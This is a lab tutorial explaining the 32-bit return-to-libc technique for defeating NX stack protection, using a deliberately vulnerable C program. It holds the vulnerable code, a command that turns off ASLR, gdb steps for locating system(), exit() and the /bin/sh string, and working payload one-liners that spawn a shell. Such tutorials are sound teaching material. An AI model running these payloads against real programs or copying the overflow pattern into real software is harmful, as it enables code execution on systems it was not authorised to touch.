# Return-to-libc / ret2libc

## Return-to-libc / ret2libc

The purpose of this lab is to familiarize with a ret-to-libc technique, which is used to exploit buffer overflow vulnerabilities on systems where stack memory is protected with no execute (NX) bit.

### Overview

{% hint style="info" %}

* The ret-to-libc technique is applicable to \*nix systems.
* This lab is only concerned with 32-bit architecture.
  {% endhint %}

In a standard stack-based buffer overflow, an attacker writes their shellcode into the vulnerable program's stack and executes it on the stack.

However, if the vulnerable program's stack is protected (NX bit is set, which is the case on newer systems), attackers can no longer execute their shellcode from the vulnerable program's stack.

To fight the NX protection, a return-to-libc technique is used, which enables attackers to bypass the NX bit protection and subvert the vulnerable program's execution flow by re-using existing executable code from the standard C library shared object (/lib/i386-linux-gnu/libc-\*.so), that is already loaded and mapped into the vulnerable program's virtual memory space, similarly like ntdll.dll is loaded to all Windows programs.

At a high level, ret-to-libc technique is similar to the regular stack overflow attack, but with one key difference - instead of overwritting the return address of the vulnerable function with address of the shellcode when exploiting a regular stack-based overflow with no stack protection, in ret-to-libc case, the return address is overwritten with a memory address that points to the function `system(const char *command)` that lives in the `libc` library, so that when the overflowed function returns, the vulnerable program is forced to jump to the `system()` function and execute the shell command that was passed to the `system()` function as the `*command` argument as part of the supplied shellcode.

In our case, we will want the vulnerable program to spawn the `/bin/sh` shell, so we will make the vulnerable program call `system("/bin/sh")`.

#### Diagram

Below is a simplified diagram that illustrates stack memory layout during the ret-to-libc exploitation process, that we will build in this lab:

![Stack memory layout of the 32-bit vulnerable program when using ret-to-libc technique](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY1FO9lURZfx9fTrAf0%2Fimage.png?alt=media\&token=39659182-e3ff-4d34-a031-c7091567890a)

Points to note in the overflowed buffer:

1. EIP is overwritten with address of the `system()` function located inside `libc`;
2. Right after the address of `system()`, there's address of the function `exit()`, so that once `system()` returns, the vulnerable program jumps the `exit()`, which also lives in the `libc`, so that the vulnerable program can exit gracefully;
3. Right after the address of `exit()`, there's a pointer to a memory location that contains the string `/bin/sh`, which is the argument we want to pass to the `system()` function.

#### Stack Layout

From the above diagram (after overflow), if you are wondering why, when looking from top to bottom, the stack's contents are:

1. Address of the `/bin/sh` string
2. Address of the `exit()` function
3. Address of the `system()` function

...we need to remember what happens with the stack when a function is called:

1. Function arguments are pushed on to the stack in reverse order, meaning the left-most argument will be pushed last;
2. Return address, telling the program where to return after the function completes, is pushed;
3. EBP is pushed;
4. Local variables are pushed.

With the above in mind, it should now be clear why the overflowed stack looks that way - essentially, we manually built an arbitrary/half-backed stack frame for the `system()` function call:

* we pushed an address that contains the string `/bin/sh` - the argument for our `system()` call;
* we also pushed a return address, which the vulnerable program will jump to once the `system()` call completes, which in our case is the address of the function `exit()`.

### Vulnerable Program

The below is our vulnerable program for this lab, which takes user input as a commandline argument and copies it to a memory location inside the program, without checking if the user supplied buffer is bigger than the allocated memory:

{% code title="vulnerable.c" %}

```cpp
#include <stdio.h>

int main(int argc, char *argv[])
{
    char buf[8];
    memcpy(buf, argv[1], strlen(argv[1]));
    printf(buf);
}
```

{% endcode %}

Let's compile the above code:

```csharp
cc vulnerable.c -mpreferred-stack-boundary=2 -o vulnerable
```

![Vulnerable program compiled](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY-w-mKCgQXL-6OCe6o%2Fimage.png?alt=media\&token=3a73de74-2bee-422a-b299-bf1f4cdf67e6)

Also, let's temporarily switch off the Address Space Layout Randomization (ASLR) to ensure it does not get in the way of this lab:

```bash
echo 0 > /proc/sys/kernel/randomize_va_space
```

![Temporarily disable ASLR](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MYHHC9b4fYfzX6iiib5%2F-MYHIi6TOPCJ1IB9TR5Q%2Fimage.png?alt=media\&token=3ef13eb9-d181-460b-8477-1ec17559c803)

Let's now execute the vulnerable program via gdb, set a breakpoint on the function `main` and continue the execution:

```bash
gdb vulnerable anything
b main
r
```

![Spawn vulnerable program with gdb, getting our hands dirty](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY0zQEEFFdlVlFiQ3gN%2Fimage.png?alt=media\&token=eea8c8b2-389a-44ea-b833-28cf66d6033f)

Additionally, we can confirm our binary has various protections enabled for it with the key one for this lab being the NX protection:

```
checksec
```

![Protections overview for the vulnerable program](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY1LV7Z6Z6X71D-iUJy%2Fimage.png?alt=media\&token=acdb1e71-21be-467e-bb04-88b9146c424d)

### Finding system()

In gdb, by doing:

```csharp
p system
```

...we can see, that the function `system` resides at memory location `0xb7e13870` inside the vulnerable program in the `libc` library:

![system() is located at 0xb7e13870](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY-xv-Xx6JOGYGR7zKU%2Fimage.png?alt=media\&token=00cfbcee-a4fa-42ee-9670-e7bc4c7be1b8)

### Finding exit()

The same way, we can see that `exit()` resides at `0xb7e06c30`:

![exit() is located at 0xb7e06c30](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY0n9jBZh8LWSrGjnMr%2Fimage.png?alt=media\&token=f4264d32-f0e9-4e78-bda8-2c7c96c646bc)

### Finding /bin/sh

#### Inside libc

We want to hijack the vulnerable program and force it to call `system("/bin/sh")` and spawn the `/bin/sh` for us.

We need to remember that `system()` function is declared as `system(const char *command)`, meaning if we want to invoke it, we need to pass it a memory address that contains the string that we want it to execute (`/bin/sh`). We need to find a memory location inside the vulnerable program that contains the string `/bin/sh`. It's known that the `libc` contains that string - let's see how we can find it.

We can inspect the memory layout of the vulnerable program and find the start address of the `libc` (what memory address inside the vulnerable program it's is loaded to):

```csharp
gdb-peda$ info proc map
```

Below shows that `/lib/i386-linux-gnu/libc-2.27.so` inside the vulnerable program starts at `0xb7dd6000`:

![Inside the vulenerable program, libc is loaded at 0xb7dd6000](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY0kDEJPoenLD46Y0xF%2Fimage.png?alt=media\&token=cab3ef6b-2680-45ba-a143-59a817a8fcec)

We can now use the `strings` utility to find the offset of string `/bin/sh` relative to the start of the `libc` binary:

```csharp
strings -a -t x /lib/i386-linux-gnu/libc-2.27.so | grep "/bin/sh"
```

We can see that the string is found at offset `0x17c968`:

![/bin/sh is at offset 0x17c968 from the start of libc](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY0ka94-cGpi_Dnpqj3%2Fimage.png?alt=media\&token=52097ce9-8371-4d8a-95a8-7e00eefca990)

...which means, that in our vulnerable program, at address `0xb7f52968` (`0xb7dd6000` + `17c968`), we should see the string `/bin/sh`, so let's test it:

```csharp
x/s 0xb7f52968
```

Below shows that `/bin/sh` indeed lives at `0xb7f52968`:

![/bin/sh inside vulnerable program is located at 0xb7f52968](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY11Z_5pCUZq7HHPaer%2Fimage.png?alt=media\&token=595d9cfa-ed72-4729-95b8-ba4ce9f4dc3b)

#### Inside SHELL Environment Variable

Additionally, we can find the location of the environment variable `SHELL=/bin/sh` on the vulnerable program's stack:

```c
x/s 500 $esp
```

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MY1Yb7xveNHt1fZgTDb%2F-MY6u-zpTFBbRfLEcPr3%2Fimage.png?alt=media\&token=28bddcec-0ea8-4a76-be04-313eafa4a4dd)

In the above screenshot, we can see that at `0xbffffeea` we have the string `SHELL=/bin/sh`. Since we only need the address of the string `/bin/sh` (without the `SHELL=` bit in front, which is 6 characters long), we know that `0xbffffeea + 6` will give us the exact location we are looking for, which is `0xBFFFFEF0`:

![/bin/sh as an environment variable inside the vulnerable program at 0xBFFFFEF0](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MY1Yb7xveNHt1fZgTDb%2F-MY6vdas115YNOAlaHR6%2Fimage.png?alt=media\&token=ec37724b-8d5f-4207-9425-9917dfeb542a)

#### Find String in gdb-peda

Worth remembering, that we can look for the required string using gdb-peda like so:

```
find "/bin/sh"
```

![/bin/sh can be seen in multiple locations in the vulnerable program](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MaJLAqa7-PErC9_2p3p%2F-MaJVwpR6zeeceEXHCMV%2Fimage.png?alt=media\&token=b9f3df3b-8a8a-4287-b372-1f0ff732cd6f)

### Exploiting

Assuming we need to send 16 bytes of garbage to the vulnerable program before we can overwrite its return address, and make it jump to `system()` (located at `0xb7e13870`, expressed as `\x70\x38\xe1\xb7` due to little-endianness), which will execute `/bin/sh` that's present in `0xb7f52968` (expressed as `\x68\x29\xf5\xb7`), the payload in a general form looks like this:

```csharp
payload = A*16 + address of system() + return address for system() + address of "/bin/sh"
```

...and when variables are filled in with correct memory addresses, the final exploit looks like this:

```c
r `python -c 'print("A"*16 + "\x70\x38\xe1\xb7" + "\x30\x6c\xe0\xb7" + "\x68\x29\xf5\xb7")'`
```

Once executed, we can observe how `/bin/sh` gets executed:

![Vulnerable program spawns a /bin/sh shell](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MXwAmlrjE8Ejl_0OQQX%2F-MY1KX87XYz5e8DhrlWv%2Fimage.png?alt=media\&token=f1cf3532-bf4c-4a16-a9f1-609f4604978e)

Let's see if the exploit works outside gdb:

{% hint style="warning" %}
Addresses of `system()`, `exit()` and `/bin/sh` used in the below payload are different to those captured in earlier screenshots due to a rebooted VM.
{% endhint %}

```python
./vulnerable `python -c 'print("A"*16 + "\x40\xe0\xe0\xb7" + "\x90\xb3\xf0\xb7" + "\x3c\x53\xf5\xb7")'`
```

![Once the vulnerable program is exploited, it spawns a /bin/sh](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-MY6wM5sxRcqLyZ5Y6WZ%2F-MYHGACL5bNnb02IeV5G%2Fexploit-outside-gdb.gif?alt=media\&token=c73b28a9-75c4-462b-afdb-d24b644d3020)

### References

<https://www.exploit-db.com/docs/english/28553-linux-classic-return-to-libc-&-return-to-libc-chaining-tutorial.pdf>

<https://css.csail.mit.edu/6.858/2019/readings/return-to-libc.pdf>